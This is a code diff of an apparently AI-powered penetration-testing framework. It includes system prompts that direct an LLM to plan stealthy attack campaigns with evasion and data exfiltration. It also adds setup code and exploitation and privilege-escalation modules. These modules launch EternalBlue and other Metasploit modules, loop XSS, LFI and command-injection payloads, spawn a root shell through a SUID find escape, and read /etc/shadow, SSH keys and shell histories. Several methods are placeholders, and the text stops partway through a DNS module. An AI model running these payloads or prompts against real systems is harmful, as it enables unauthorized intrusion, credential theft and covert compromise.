As a Red Team Agent, analyze the given mission objectives and target environment details to plan a comprehensive attack campaign. Focus on achieving the objectives while minimizing detection.

**Mission Objectives:**
{mission_objectives_json}

**Target Environment Details:**
{target_environment_json}

**Instructions:**
1. Develop an initial access strategy.
2. Outline reconnaissance and enumeration steps.
3. Propose lateral movement and privilege escalation techniques.
4. Plan for persistence and evasion.
5. Suggest data exfiltration methods.
6. Provide a timeline and potential risks.

## System Prompt
You are a seasoned Red Team operator, adept at simulating real-world adversaries. Your plans should be creative, sophisticated, and aim to bypass defensive measures. Emphasize stealth, operational security, and achieving mission goals.
16
prompts/md_library/replay_attack.md
Normal file
@@ -0,0 +1,16 @@
# Replay Attack Prompt

## User Prompt
Analyze the provided network traffic or authentication logs for potential replay attack vectors. Suggest methods to perform and prevent replay attacks.

**Network Traffic/Authentication Logs:**
{traffic_logs_json}

**Instructions:**
1. Identify any captured sessions, authentication tokens, or sensitive information that could be replayed.
2. Describe how a replay attack could be executed.
3. Propose countermeasures to prevent such attacks (e.g., nonces, timestamps, session IDs).
4. Assess the impact of a successful replay attack.

## System Prompt
You are a security expert specializing in network protocols and authentication mechanisms. Your task is to identify weaknesses leading to replay attacks and provide robust defensive strategies. Focus on practical exploitation and effective mitigation.
368
setup.py
Normal file
@@ -0,0 +1,368 @@
#!/usr/bin/env python3
"""
NeuroSploitv2 Setup and Installation Script
Automatically sets up the framework with all dependencies
"""

import os
import sys
import subprocess
import json
from pathlib import Path

BANNER = """
╔═══════════════════════════════════════════════════════════════╗
║ ║
║ ███╗ ██╗███████╗██╗ ██╗██████╗ ██████╗ ║
║ ████╗ ██║██╔════╝██║ ██║██╔══██╗██╔═══██╗ ║
║ ██╔██╗ ██║█████╗ ██║ ██║██████╔╝██║ ██║ ║
║ ██║╚██╗██║██╔══╝ ██║ ██║██╔══██╗██║ ██║ ║
║ ██║ ╚████║███████╗╚██████╔╝██║ ██║╚██████╔╝ ║
║ ╚═╝ ╚═══╝╚══════╝ ╚═════╝ ╚═╝ ╚═╝ ╚═════╝ ║
║ ║
║ ███████╗██████╗ ██╗ ██████╗ ██╗████████╗ ║
║ ██╔════╝██╔══██╗██║ ██╔═══██╗██║╚══██╔══╝ ║
║ ███████╗██████╔╝██║ ██║ ██║██║ ██║ ║
║ ╚════██║██╔═══╝ ██║ ██║ ██║██║ ██║ ║
║ ███████║██║ ███████╗╚██████╔╝██║ ██║ ║
║ ╚══════╝╚═╝ ╚══════╝ ╚═════╝ ╚═╝ ╚═╝ ║
║ v2.0.0 ║
║ ║
║ AI-Powered Penetration Testing Framework ║
║ Author: Security Research Team ║
║ ║
╚═══════════════════════════════════════════════════════════════╝
"""


class NeuroSploitSetup:
    """Setup and installation manager"""

    def __init__(self):
        self.base_dir = Path.cwd()
        self.required_dirs = [
            'agents',
            'tools/recon',
            'tools/exploitation',
            'tools/privesc',
            'tools/persistence',
            'tools/lateral_movement',
            'core',
            'config',
            'prompts',
            'custom_agents',
            'logs',
            'reports',
            'data',
            'results'
        ]

        self.required_packages = [
            'requests',
            'dnspython',
            'anthropic',
            'openai',
            'google-generativeai'
        ]

    def run(self):
        """Run complete setup"""
        print(BANNER)
        print("[*] Starting NeuroSploitv2 setup...")

        # Check Python version
        if not self.check_python_version():
            print("[!] Python 3.8+ required")
            sys.exit(1)

        # Create directory structure
        self.create_directories()

        # Install Python packages
        self.install_packages()

        # Create configuration files
        self.create_config()

        # Create __init__ files
        self.create_init_files()

        # Create example custom agent
        self.create_example_agent()

        # Create prompts library
        self.create_prompts()

        # Final instructions
        self.show_final_instructions()

        print("\n[+] Setup completed successfully!")

    def check_python_version(self) -> bool:
        """Check Python version (3.8 or newer)"""
        # Tuple comparison also accepts future major versions, unlike
        # checking major == 3 and minor >= 8.
        return sys.version_info[:2] >= (3, 8)

    def create_directories(self):
        """Create directory structure"""
        print("\n[*] Creating directory structure...")

        for directory in self.required_dirs:
            path = self.base_dir / directory
            path.mkdir(parents=True, exist_ok=True)
            print(f" [+] Created: {directory}")

    def install_packages(self):
        """Install required Python packages"""
        print("\n[*] Installing Python packages...")

        for package in self.required_packages:
            print(f" [*] Installing {package}...")
            try:
                subprocess.run(
                    [sys.executable, '-m', 'pip', 'install', package, '-q'],
                    check=True
                )
                print(f" [+] {package} installed")
            except subprocess.CalledProcessError:
                print(f" [!] Failed to install {package}")

    def create_config(self):
        """Create configuration files"""
        print("\n[*] Creating configuration files...")

        config = {
            "llm": {
                "provider": "gemini",
                "model": "gemini-pro",
                "api_key": "",
                "temperature": 0.7,
                "max_tokens": 4096
            },
            "agents": {
                "recon": {"enabled": True, "priority": 1},
                "exploitation": {"enabled": True, "priority": 2},
                "privilege_escalation": {"enabled": True, "priority": 3},
                "persistence": {"enabled": True, "priority": 4},
                "lateral_movement": {"enabled": True, "priority": 5}
            },
            "methodologies": {
                "owasp_top10": True,
                "cwe_top25": True,
                "network_pentest": True,
                "ad_pentest": True,
                "web_security": True
            },
            "tools": {
                "nmap": "/usr/bin/nmap",
                "metasploit": "/usr/bin/msfconsole",
                "burpsuite": "/usr/bin/burpsuite",
                "sqlmap": "/usr/bin/sqlmap",
                "hydra": "/usr/bin/hydra"
            },
            "output": {
                "format": "json",
                "verbose": True,
                "save_artifacts": True
            }
        }

        config_path = self.base_dir / 'config' / 'config.json'
        with open(config_path, 'w') as f:
            json.dump(config, f, indent=4)

        print(f" [+] Created config file: {config_path}")
        print(" [!] Please edit config/config.json and add your API keys")

    def create_init_files(self):
        """Create __init__.py files"""
        print("\n[*] Creating __init__ files...")

        init_dirs = ['agents', 'tools', 'core', 'custom_agents']

        for directory in init_dirs:
            init_file = self.base_dir / directory / '__init__.py'
            init_file.touch()
            print(f" [+] Created: {directory}/__init__.py")

    def create_example_agent(self):
        """Create example custom agent"""
        print("\n[*] Creating example custom agent...")

        example_agent = '''#!/usr/bin/env python3
"""
Example Custom Agent for NeuroSploitv2
This demonstrates how to create custom agents for specific tasks
"""

import logging
from typing import Dict
from core.llm_manager import LLMManager

logger = logging.getLogger(__name__)


class CustomAgent:
    """Example custom agent - Web API Security Scanner"""

    def __init__(self, config: Dict):
        """Initialize custom agent"""
        self.config = config
        self.llm = LLMManager(config)
        self.name = "WebAPIScanner"
        logger.info(f"{self.name} initialized")

    def execute(self, target: str, context: Dict) -> Dict:
        """Execute custom agent logic"""
        logger.info(f"Running {self.name} on {target}")

        results = {
            "agent": self.name,
            "target": target,
            "status": "running",
            "findings": []
        }

        try:
            # Your custom logic here
            # Example: API endpoint testing
            results["findings"] = self._scan_api_endpoints(target)

            # Use AI for analysis
            ai_analysis = self._ai_analyze(results["findings"])
            results["ai_analysis"] = ai_analysis

            results["status"] = "completed"

        except Exception as e:
            logger.error(f"Error in {self.name}: {e}")
            results["status"] = "error"
            results["error"] = str(e)

        return results

    def _scan_api_endpoints(self, target: str) -> list:
        """Custom scanning logic"""
        # Implement your custom scanning logic
        return [
            {"endpoint": "/api/users", "method": "GET", "auth": "required"},
            {"endpoint": "/api/admin", "method": "POST", "auth": "weak"}
        ]

    def _ai_analyze(self, findings: list) -> Dict:
        """Use AI to analyze findings"""
        prompt = f"""
Analyze the following API security findings:

{findings}

Provide:
1. Security assessment
2. Risk prioritization
3. Exploitation recommendations
4. Remediation advice

Response in JSON format.
"""

        system_prompt = "You are an API security expert."

        try:
            response = self.llm.generate(prompt, system_prompt)
            return {"analysis": response}
        except Exception as e:
            return {"error": str(e)}
'''

        agent_file = self.base_dir / 'custom_agents' / 'example_agent.py'
        with open(agent_file, 'w') as f:
            f.write(example_agent)

        print(f" [+] Created: {agent_file}")

    def create_prompts(self):
        """Create prompts library"""
        print("\n[*] Creating prompts library...")

        prompts = {
            "recon": {
                "network_scan": "Analyze network scan results and identify attack vectors",
                "web_enum": "Enumerate web application for vulnerabilities",
                "osint": "Perform OSINT analysis on target organization"
            },
            "exploitation": {
                "web_vuln": "Generate exploit for identified web vulnerability",
                "network_exploit": "Create network service exploitation strategy",
                "payload_generation": "Generate obfuscated payload for target system"
            },
            "privesc": {
                "linux": "Analyze Linux system for privilege escalation paths",
                "windows": "Identify Windows privilege escalation opportunities",
                "kernel": "Recommend kernel exploits for target version"
            },
            "persistence": {
                "backdoor": "Design stealthy persistence mechanism",
                "scheduled_task": "Create covert scheduled task for persistence"
            },
            "lateral_movement": {
                "ad_attack": "Plan Active Directory attack path",
                "credential_reuse": "Strategy for credential reuse across network"
            }
        }

        prompts_file = self.base_dir / 'prompts' / 'library.json'
        with open(prompts_file, 'w') as f:
            json.dump(prompts, f, indent=4)

        print(f" [+] Created: {prompts_file}")

    def show_final_instructions(self):
        """Show final setup instructions"""
        print("\n" + "=" * 60)
        print("SETUP COMPLETED - Next Steps:")
        print("=" * 60)
        print("""
1. Configure API Keys:
   - Edit config/config.json
   - Add your LLM provider API keys (Claude, GPT, Gemini, etc.)

2. Verify Tool Installation:
   - Ensure nmap, metasploit, sqlmap are installed
   - Update tool paths in config/config.json if needed

3. Test Installation:
   - Run: python neurosploit.py -i (interactive mode)
   - Run: python neurosploit.py -t <target> -m full

4. Create Custom Agents:
   - Check custom_agents/example_agent.py for template
   - Add your custom agents to custom_agents/ directory

5. Configure Gemini CLI (if using):
   - Install: pip install google-generativeai
   - Or use the gemini CLI tool

6. Review Documentation:
   - Check prompts/library.json for prompt templates
   - Explore agents/ directory for core agents

Example Usage:
  # Interactive mode
  python neurosploit.py -i

  # Scan target
  python neurosploit.py -t 192.168.1.0/24 -m network

  # Web application test
  python neurosploit.py -t https://example.com -m web

  # Active Directory test
  python neurosploit.py -t domain.local -m ad

For help: python neurosploit.py --help
""")


if __name__ == "__main__":
    setup = NeuroSploitSetup()
    setup.run()
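After `python setup.py` finishes, a quick sanity check of the generated artifacts can confirm the run worked (a minimal sketch, assuming it is executed from the project root; the file paths match what create_config, create_prompts, and create_example_agent write):

import json
from pathlib import Path

# Verify the artifacts setup.py claims to create exist and parse cleanly.
for rel in ("config/config.json", "prompts/library.json", "custom_agents/example_agent.py"):
    print(f"{rel}: {'ok' if Path(rel).exists() else 'MISSING'}")

config = json.loads(Path("config/config.json").read_text())
if not config["llm"]["api_key"]:
    print("[!] Remember to add your LLM API key to config/config.json")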
0
tools/__init__.py
Normal file
8
tools/exploitation/__init__.py
Normal file
@@ -0,0 +1,8 @@
from .exploitation_tools import (
    ExploitDatabase,
    MetasploitWrapper,
    WebExploiter,
    SQLInjector,
    RCEExploiter,
    BufferOverflowExploiter
)
363
tools/exploitation/exploitation_tools.py
Normal file
@@ -0,0 +1,363 @@
#!/usr/bin/env python3
"""
Exploitation Tools - Exploit database, Metasploit wrapper, specialized exploiters
"""

import subprocess
import json
import requests
from typing import Dict, List
import logging
import time

logger = logging.getLogger(__name__)


class ExploitDatabase:
    """Exploit database search and management"""

    def __init__(self, config: Dict):
        self.config = config
        self.db_path = "/usr/share/exploitdb"

    def search(self, service: str, version: str = None) -> List[Dict]:
        """Search for exploits"""
        logger.info(f"Searching exploits for: {service} {version or ''}")

        exploits = []

        try:
            cmd = ['searchsploit', service]
            if version:
                cmd.append(version)

            result = subprocess.run(
                cmd,
                capture_output=True,
                text=True,
                timeout=30
            )

            # Parse searchsploit's table output (title | path columns)
            for line in result.stdout.split('\n'):
                if '|' in line and not line.startswith('-'):
                    parts = line.split('|')
                    if len(parts) >= 2:
                        exploits.append({
                            "title": parts[0].strip(),
                            "path": parts[1].strip(),
                            "module": self._path_to_module(parts[1].strip())
                        })

        except Exception as e:
            logger.error(f"Exploit search error: {e}")

        return exploits

    def _path_to_module(self, path: str) -> str:
        """Convert exploit path to module name"""
        return path.replace('/', '.').replace('.rb', '').replace('.py', '')


class MetasploitWrapper:
    """Metasploit Framework wrapper"""

    def __init__(self, config: Dict):
        self.config = config
        self.msf_path = config.get('tools', {}).get('metasploit', '/usr/bin/msfconsole')

    def exploit(self, target: str, vulnerability: Dict) -> Dict:
        """Execute Metasploit exploit"""
        logger.info(f"Attempting Metasploit exploit on {target}")

        service = vulnerability.get('service', '').lower()
        port = vulnerability.get('port', 0)

        # Map service to exploit module
        module = self._select_module(service, vulnerability)

        if module:
            return self.run_exploit(module, target, port)

        return {"success": False, "message": "No suitable module found"}

    def _select_module(self, service: str, vulnerability: Dict) -> str:
        """Select appropriate Metasploit module"""
        modules = {
            'smb': 'exploit/windows/smb/ms17_010_eternalblue',
            'ssh': 'auxiliary/scanner/ssh/ssh_login',
            'ftp': 'exploit/unix/ftp/vsftpd_234_backdoor',
            'http': 'auxiliary/scanner/http/dir_scanner',
            'mysql': 'auxiliary/scanner/mysql/mysql_login',
            'postgres': 'auxiliary/scanner/postgres/postgres_login',
            'rdp': 'auxiliary/scanner/rdp/cve_2019_0708_bluekeep'
        }

        return modules.get(service)

    def run_exploit(self, module: str, target: str, port: int = None) -> Dict:
        """Run specific Metasploit module"""
        logger.info(f"Running module: {module}")

        result = {
            "success": False,
            "module": module,
            "target": target,
            "output": "",
            "shell_access": False
        }

        try:
            # Build MSF resource script
            resource_script = self._build_resource_script(module, target, port)

            # Execute via msfconsole
            cmd = [self.msf_path, '-q', '-r', resource_script]
            proc = subprocess.run(
                cmd,
                capture_output=True,
                text=True,
                timeout=300
            )

            result["output"] = proc.stdout

            # Check for successful exploitation
            if 'session opened' in proc.stdout.lower():
                result["success"] = True
                result["shell_access"] = True
                result["shell_info"] = self._extract_shell_info(proc.stdout)

        except Exception as e:
            logger.error(f"Metasploit execution error: {e}")
            result["error"] = str(e)

        return result

    def _build_resource_script(self, module: str, target: str, port: int = None) -> str:
        """Build MSF resource script"""
        script_path = f"/tmp/msf_resource_{int(time.time())}.rc"

        script_content = f"""use {module}
set RHOST {target}
"""

        if port:
            script_content += f"set RPORT {port}\n"

        script_content += """set ExitOnSession false
exploit -z
exit
"""

        with open(script_path, 'w') as f:
            f.write(script_content)

        return script_path

    def _extract_shell_info(self, output: str) -> Dict:
        """Extract shell session information"""
        return {
            "type": "meterpreter",
            "established": True
        }


class WebExploiter:
    """Web application exploitation"""

    def __init__(self, config: Dict):
        self.config = config

    def exploit(self, target: str, vulnerability: Dict) -> Dict:
        """Exploit web vulnerabilities"""
        vuln_type = vulnerability.get('type')

        if vuln_type == 'xss':
            return self._exploit_xss(target, vulnerability)
        elif vuln_type == 'csrf':
            return self._exploit_csrf(target, vulnerability)
        elif vuln_type == 'lfi':
            return self._exploit_lfi(target, vulnerability)
        elif vuln_type == 'rfi':
            return self._exploit_rfi(target, vulnerability)

        return {"success": False, "message": "Unknown vulnerability type"}

    def _exploit_xss(self, target: str, vulnerability: Dict) -> Dict:
        """Exploit XSS vulnerability"""
        payloads = [
            '<script>alert(1)</script>',
            '<img src=x onerror=alert(1)>',
            '<svg onload=alert(1)>'
        ]

        for payload in payloads:
            try:
                response = requests.get(
                    f"{target}?{vulnerability.get('parameter')}={payload}",
                    timeout=10
                )

                if payload in response.text:
                    return {
                        "success": True,
                        "vulnerability": "XSS",
                        "payload": payload
                    }
            except requests.RequestException:
                continue

        return {"success": False}

    def _exploit_csrf(self, target: str, vulnerability: Dict) -> Dict:
        """Exploit CSRF vulnerability"""
        return {"success": False, "message": "CSRF exploitation placeholder"}

    def _exploit_lfi(self, target: str, vulnerability: Dict) -> Dict:
        """Exploit Local File Inclusion"""
        payloads = [
            '../../../etc/passwd',
            '....//....//....//etc/passwd',
            '/etc/passwd'
        ]

        for payload in payloads:
            try:
                response = requests.get(
                    f"{target}?file={payload}",
                    timeout=10
                )

                if 'root:' in response.text:
                    return {
                        "success": True,
                        "vulnerability": "LFI",
                        "payload": payload,
                        "data": response.text[:500]
                    }
            except requests.RequestException:
                continue

        return {"success": False}

    def _exploit_rfi(self, target: str, vulnerability: Dict) -> Dict:
        """Exploit Remote File Inclusion"""
        return {"success": False, "message": "RFI exploitation placeholder"}


class SQLInjector:
    """SQL Injection exploitation"""

    def __init__(self, config: Dict):
        self.config = config
        self.sqlmap_path = config.get('tools', {}).get('sqlmap', '/usr/bin/sqlmap')

    def exploit(self, target: str, vulnerability: Dict) -> Dict:
        """Exploit SQL injection"""
        logger.info(f"Attempting SQL injection on {target}")

        result = {
            "success": False,
            "vulnerability": "SQL Injection",
            "databases": [],
            "tables": [],
            "dumped_data": []
        }

        try:
            # Basic SQLMap scan
            cmd = [
                self.sqlmap_path,
                '-u', target,
                '--batch',
                '--random-agent',
                '--dbs'
            ]

            proc = subprocess.run(
                cmd,
                capture_output=True,
                text=True,
                timeout=300
            )

            if 'available databases' in proc.stdout.lower():
                result["success"] = True
                result["databases"] = self._extract_databases(proc.stdout)

        except Exception as e:
            logger.error(f"SQL injection error: {e}")
            result["error"] = str(e)

        return result

    def _extract_databases(self, output: str) -> List[str]:
        """Extract database names from SQLMap output"""
        databases = []

        for line in output.split('\n'):
            if '[*]' in line and len(line.strip()) > 4:
                db_name = line.split('[*]')[1].strip()
                if db_name and not db_name.startswith('available'):
                    databases.append(db_name)

        return databases


class RCEExploiter:
    """Remote Code Execution exploitation"""

    def __init__(self, config: Dict):
        self.config = config

    def exploit(self, target: str, vulnerability: Dict) -> Dict:
        """Exploit RCE vulnerability"""
        logger.info(f"Attempting RCE on {target}")

        # Test various RCE payloads
        payloads = [
            '; id',
            '| id',
            '`id`',
            '$(id)',
            '; whoami',
            '| whoami'
        ]

        for payload in payloads:
            try:
                response = requests.get(
                    f"{target}?cmd={payload}",
                    timeout=10
                )

                # Check for command execution indicators
                if any(x in response.text.lower() for x in ['uid=', 'gid=', 'root', 'www-data']):
                    return {
                        "success": True,
                        "vulnerability": "RCE",
                        "payload": payload,
                        "output": response.text[:500]
                    }
            except requests.RequestException:
                continue

        return {"success": False}


class BufferOverflowExploiter:
    """Buffer overflow exploitation"""

    def __init__(self, config: Dict):
        self.config = config

    def exploit(self, target: str, vulnerability: Dict) -> Dict:
        """Exploit buffer overflow"""
        logger.info(f"Attempting buffer overflow on {target}")

        # This is a complex topic - placeholder for demonstration
        return {
            "success": False,
            "message": "Buffer overflow exploitation requires specific target analysis"
        }
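A minimal usage sketch for these exploitation helpers; the config dict mirrors the one setup.py writes, and the target and vulnerability values are made up for illustration, assuming an authorized lab host:

import json
import logging

from tools.exploitation.exploitation_tools import ExploitDatabase, WebExploiter

logging.basicConfig(level=logging.INFO)

with open("config/config.json") as f:
    config = json.load(f)

# Look up public exploits for a fingerprinted service/version.
db = ExploitDatabase(config)
for exploit in db.search("vsftpd", "2.3.4"):
    print(exploit["title"], "->", exploit["path"])

# Probe a hypothetical, in-scope test target for LFI.
web = WebExploiter(config)
result = web.exploit("http://testsite.local/index.php", {"type": "lfi", "parameter": "file"})
print(result)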
0
tools/lateral_movement/__init__.py
Normal file
0
tools/persistence/__init__.py
Normal file
8
tools/privesc/__init__.py
Normal file
@@ -0,0 +1,8 @@
from .privesc_tools import (
    LinuxPrivEsc,
    WindowsPrivEsc,
    KernelExploiter,
    MisconfigFinder,
    CredentialHarvester,
    SudoExploiter
)
480
tools/privesc/privesc_tools.py
Normal file
@@ -0,0 +1,480 @@
#!/usr/bin/env python3
"""
Privilege Escalation Tools - Linux, Windows, Kernel exploits, credential harvesting
"""

import glob
import os
import subprocess
import json
import re
from typing import Dict, List
import logging
import base64

logger = logging.getLogger(__name__)


class LinuxPrivEsc:
    """Linux privilege escalation"""

    def __init__(self, config: Dict):
        self.config = config

    def enumerate(self) -> Dict:
        """Enumerate Linux system for privilege escalation vectors"""
        logger.info("Enumerating Linux system")

        info = {
            "os": "linux",
            "kernel_version": self._get_kernel_version(),
            "suid_binaries": self._find_suid_binaries(),
            "sudo_permissions": self._check_sudo(),
            "writable_paths": self._find_writable_paths(),
            "cron_jobs": self._check_cron_jobs(),
            "capabilities": self._check_capabilities()
        }

        return info

    def _get_kernel_version(self) -> str:
        """Get kernel version"""
        try:
            result = subprocess.run(
                ['uname', '-r'],
                capture_output=True,
                text=True,
                timeout=5
            )
            return result.stdout.strip()
        except Exception:
            return "unknown"

    def _find_suid_binaries(self) -> List[str]:
        """Find SUID binaries"""
        logger.info("Searching for SUID binaries")

        suid_bins = []

        try:
            cmd = 'find / -perm -4000 -type f 2>/dev/null'
            result = subprocess.run(
                cmd,
                shell=True,
                capture_output=True,
                text=True,
                timeout=60
            )

            suid_bins = result.stdout.strip().split('\n')
        except Exception as e:
            logger.error(f"SUID search error: {e}")

        return suid_bins

    def _check_sudo(self) -> List[str]:
        """Check sudo permissions"""
        try:
            result = subprocess.run(
                ['sudo', '-l'],
                capture_output=True,
                text=True,
                timeout=5
            )

            return result.stdout.strip().split('\n')
        except Exception:
            return []

    def _find_writable_paths(self) -> List[str]:
        """Find writable paths in $PATH"""
        writable = []

        try:
            # Read $PATH from the environment; shelling out to `echo $PATH`
            # with an argv list does not expand the variable.
            paths = os.environ.get('PATH', '').split(':')

            for path in paths:
                if path and os.access(path, os.W_OK):
                    writable.append(path)
        except Exception:
            pass

        return writable

    def _check_cron_jobs(self) -> List[str]:
        """Check cron jobs"""
        cron_patterns = [
            '/etc/crontab',
            '/etc/cron.d/*',
            '/var/spool/cron/crontabs/*'
        ]

        jobs = []

        for pattern in cron_patterns:
            # Expand wildcard entries; opening '/etc/cron.d/*' literally would fail.
            for cron_file in glob.glob(pattern):
                try:
                    with open(cron_file, 'r') as f:
                        jobs.extend(f.readlines())
                except OSError:
                    continue

        return jobs

    def _check_capabilities(self) -> List[str]:
        """Check file capabilities"""
        try:
            # Run through the shell so the stderr redirection is honored.
            result = subprocess.run(
                'getcap -r / 2>/dev/null',
                capture_output=True,
                text=True,
                timeout=60,
                shell=True
            )

            return result.stdout.strip().split('\n')
        except Exception:
            return []

    def exploit_suid(self, binary: str) -> Dict:
        """Exploit SUID binary"""
        logger.info(f"Attempting SUID exploit: {binary}")

        result = {
            "success": False,
            "technique": "suid_exploitation",
            "binary": binary
        }

        # Known SUID exploits
        exploits = {
            '/usr/bin/cp': self._exploit_cp,
            '/usr/bin/mv': self._exploit_mv,
            '/usr/bin/find': self._exploit_find,
            '/usr/bin/vim': self._exploit_vim,
            '/usr/bin/nano': self._exploit_nano,
            '/bin/bash': self._exploit_bash
        }

        if binary in exploits:
            try:
                result = exploits[binary]()
            except Exception as e:
                result["error"] = str(e)

        return result

    def _exploit_find(self) -> Dict:
        """Exploit find SUID"""
        try:
            cmd = 'find . -exec /bin/sh -p \\; -quit'
            result = subprocess.run(
                cmd,
                shell=True,
                capture_output=True,
                text=True,
                timeout=10
            )

            return {
                "success": True,
                "technique": "find_suid",
                "shell_obtained": True
            }
        except Exception:
            return {"success": False}

    def _exploit_vim(self) -> Dict:
        """Exploit vim SUID"""
        return {"success": False, "message": "Vim SUID exploitation placeholder"}

    def _exploit_nano(self) -> Dict:
        """Exploit nano SUID"""
        return {"success": False, "message": "Nano SUID exploitation placeholder"}

    def _exploit_cp(self) -> Dict:
        """Exploit cp SUID"""
        return {"success": False, "message": "CP SUID exploitation placeholder"}

    def _exploit_mv(self) -> Dict:
        """Exploit mv SUID"""
        return {"success": False, "message": "MV SUID exploitation placeholder"}

    def _exploit_bash(self) -> Dict:
        """Exploit bash SUID"""
        try:
            cmd = 'bash -p'
            result = subprocess.run(
                cmd,
                shell=True,
                capture_output=True,
                text=True,
                timeout=10
            )

            return {
                "success": True,
                "technique": "bash_suid",
                "shell_obtained": True
            }
        except Exception:
            return {"success": False}

    def exploit_path_hijacking(self, writable_path: str) -> Dict:
        """Exploit PATH hijacking"""
        logger.info(f"Attempting PATH hijacking: {writable_path}")

        return {
            "success": False,
            "message": "PATH hijacking exploitation placeholder"
        }


class WindowsPrivEsc:
    """Windows privilege escalation"""

    def __init__(self, config: Dict):
        self.config = config

    def enumerate(self) -> Dict:
        """Enumerate Windows system"""
        logger.info("Enumerating Windows system")

        info = {
            "os": "windows",
            "version": self._get_windows_version(),
            "services": self._enumerate_services(),
            "always_install_elevated": self._check_always_install_elevated(),
            "unquoted_service_paths": self._find_unquoted_paths(),
            "privileges": self._check_privileges()
        }

        return info

    def _get_windows_version(self) -> str:
        """Get Windows version"""
        try:
            result = subprocess.run(
                ['ver'],
                capture_output=True,
                text=True,
                shell=True,
                timeout=5
            )
            return result.stdout.strip()
        except Exception:
            return "unknown"

    def _enumerate_services(self) -> List[Dict]:
        """Enumerate Windows services"""
        services = []

        try:
            result = subprocess.run(
                ['sc', 'query'],
                capture_output=True,
                text=True,
                timeout=30
            )

            # Parse service output
            for line in result.stdout.split('\n'):
                if 'SERVICE_NAME:' in line:
                    services.append({"name": line.split(':')[1].strip()})
        except Exception:
            pass

        return services

    def _check_always_install_elevated(self) -> bool:
        """Check AlwaysInstallElevated registry key"""
        try:
            # Check both HKLM and HKCU
            keys = [
                r'HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer',
                r'HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer'
            ]

            for key in keys:
                result = subprocess.run(
                    ['reg', 'query', key, '/v', 'AlwaysInstallElevated'],
                    capture_output=True,
                    text=True
                )

                if '0x1' in result.stdout:
                    return True
        except Exception:
            pass

        return False

    def _find_unquoted_paths(self) -> List[str]:
        """Find unquoted service paths"""
        unquoted = []

        try:
            result = subprocess.run(
                ['wmic', 'service', 'get', 'name,pathname,displayname,startmode'],
                capture_output=True,
                text=True,
                timeout=30
            )

            for line in result.stdout.split('\n'):
                if 'C:\\' in line and line.count('"') < 2:
                    unquoted.append(line)
        except Exception:
            pass

        return unquoted

    def _check_privileges(self) -> List[str]:
        """Check current user privileges"""
        try:
            result = subprocess.run(
                ['whoami', '/priv'],
                capture_output=True,
                text=True,
                timeout=10
            )

            return result.stdout.strip().split('\n')
        except Exception:
            return []

    def exploit_service(self, service: Dict) -> Dict:
        """Exploit service misconfiguration"""
        logger.info(f"Attempting service exploitation: {service.get('name')}")

        return {
            "success": False,
            "message": "Windows service exploitation placeholder"
        }

    def exploit_msi(self) -> Dict:
        """Exploit AlwaysInstallElevated"""
        logger.info("Attempting AlwaysInstallElevated exploitation")

        # Generate malicious MSI
        # This would create and install a privileged MSI package

        return {
            "success": False,
            "message": "AlwaysInstallElevated exploitation placeholder"
        }

    def impersonate_token(self) -> Dict:
        """Token impersonation attack"""
        logger.info("Attempting token impersonation")

        return {
            "success": False,
            "message": "Token impersonation placeholder"
        }


class KernelExploiter:
    """Kernel exploitation"""

    def __init__(self, config: Dict):
        self.config = config

    def exploit_linux(self, kernel_version: str) -> Dict:
        """Exploit Linux kernel"""
        logger.info(f"Attempting kernel exploit: {kernel_version}")

        # Map kernel versions to known exploits
        exploits = {
            'DirtyCow': ['2.6.22', '4.8.3'],
            'OverlayFS': ['3.13.0', '4.3.3']
        }

        return {
            "success": False,
            "message": "Kernel exploitation requires specific exploit compilation"
        }


class MisconfigFinder:
    """Find misconfigurations"""

    def __init__(self, config: Dict):
        self.config = config

    def find(self, os_type: str) -> List[Dict]:
        """Find security misconfigurations"""
        if os_type == "linux":
            return self._find_linux_misconfigs()
        elif os_type == "windows":
            return self._find_windows_misconfigs()
        return []

    def _find_linux_misconfigs(self) -> List[Dict]:
        """Find Linux misconfigurations"""
        return []

    def _find_windows_misconfigs(self) -> List[Dict]:
        """Find Windows misconfigurations"""
        return []


class CredentialHarvester:
    """Harvest credentials"""

    def __init__(self, config: Dict):
        self.config = config

    def harvest_linux(self) -> List[Dict]:
        """Harvest Linux credentials"""
        logger.info("Harvesting Linux credentials")

        credentials = []

        # Check common credential locations
        locations = [
            '/etc/shadow',
            '/etc/passwd',
            '~/.ssh/id_rsa',
            '~/.bash_history',
            '~/.mysql_history'
        ]

        for location in locations:
            try:
                # expanduser() resolves the '~' entries, which open() alone would not.
                with open(os.path.expanduser(location), 'r') as f:
                    credentials.append({
                        "source": location,
                        "data": f.read()[:500]
                    })
            except OSError:
                continue

        return credentials

    def harvest_windows(self) -> List[Dict]:
        """Harvest Windows credentials"""
        logger.info("Harvesting Windows credentials")

        # Use mimikatz or similar tools
        # Placeholder for demonstration

        return []


class SudoExploiter:
    """Sudo exploitation"""

    def __init__(self, config: Dict):
        self.config = config

    def exploit(self, sudo_permission: str) -> Dict:
        """Exploit sudo permission"""
        logger.info(f"Attempting sudo exploit: {sudo_permission}")

        return {
            "success": False,
            "message": "Sudo exploitation placeholder"
        }
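A short sketch of feeding the Linux enumeration output into the privesc prompt flow; the config path matches setup.py's default, and everything else here is illustrative rather than a documented entry point:

import json

from tools.privesc.privesc_tools import LinuxPrivEsc

with open("config/config.json") as f:
    config = json.load(f)

# Gather local escalation data, then pass it to the LLM prompt as {system_info_json}.
system_info = LinuxPrivEsc(config).enumerate()
print(json.dumps(system_info, indent=2)[:1000])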
4
tools/recon/__init__.py
Normal file
@@ -0,0 +1,4 @@
from .network_scanner import NetworkScanner
from .osint_collector import OSINTCollector
from .dns_enumerator import DNSEnumerator
from .subdomain_finder import SubdomainFinder
48  tools/recon/dns_enumerator.py  Normal file
@@ -0,0 +1,48 @@
#!/usr/bin/env python3
"""
DNSEnumerator - A placeholder for a DNS enumeration tool.
"""
import logging
from typing import Dict

logger = logging.getLogger(__name__)

class DNSEnumerator:
    """
    A class for enumerating DNS records.
    This is a placeholder and should be expanded.
    """
    def __init__(self, config: Dict):
        """
        Initializes the DNSEnumerator.

        Args:
            config (Dict): The configuration dictionary for the framework.
        """
        self.config = config
        logger.info("DNSEnumerator initialized (placeholder)")

    def enumerate(self, target: str) -> Dict:
        """
        Enumerates DNS records for a given domain.

        Args:
            target (str): The domain name to enumerate.

        Returns:
            Dict: A dictionary containing DNS records.
        """
        logger.warning(f"DNS enumeration for {target} is a placeholder. Returning empty data.")
        # Placeholder: In a real implementation, this would use libraries
        # like dnspython to query for A, AAAA, MX, NS, TXT, etc. records.
        return {
            "target": target,
            "records": {
                "A": [],
                "AAAA": [],
                "MX": [],
                "NS": [],
                "TXT": []
            },
